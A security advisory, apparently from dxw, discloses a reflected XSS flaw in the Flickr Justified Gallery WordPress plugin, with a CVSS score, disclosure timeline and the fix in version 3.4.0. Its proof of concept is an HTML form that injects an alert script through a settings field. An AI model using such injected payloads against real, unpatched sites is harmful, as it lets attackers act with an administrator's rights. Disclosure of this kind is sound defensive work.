Reflected XSS in Flickr Justified Gallery could allows unauthenticated attackers to do almost anything an admin can do

Vulnerability

Last revised: July 22, 2015

This plugin contains a reflected XSS vulnerability which would allow an unauthenticated attacker to do almost anything an admin user can do.

For this to happen, the administrator would have to be tricked into clicking on a link controlled by the attacker. It is easy to make these links very convincing.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	5.8 Medium
Vector	Network
Complexity	Medium
Authentication	None
Confidentiality	Partial
Integrity	Partial
Availability	None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Visit a page containing the following in Firefox or any other browser with no reflected XSS mitigation strategies, and click submit:

<form action="http://localhost/wp-admin/options-general.php?page=fjgwpp.php" method="POST">
<input type="text" name="fjgwpp_userID" value=":&quot;>&lt;script>alert(1)&lt;/script>">
<input type="text" name="Submit" value="Save Changes">
<input type="submit">
</form>

Advisory timeline

2015-07-21: Discovered
2015-07-22: Reported to vendor via email
2015-07-22: Requested CVE
2015-07-23: Vendor responded confirming fixed in 3.4.0
2015-07-28: Published

Mitigation/further actions

Upgrade to version 3.4.0 or later

dxw advisories

Advisory: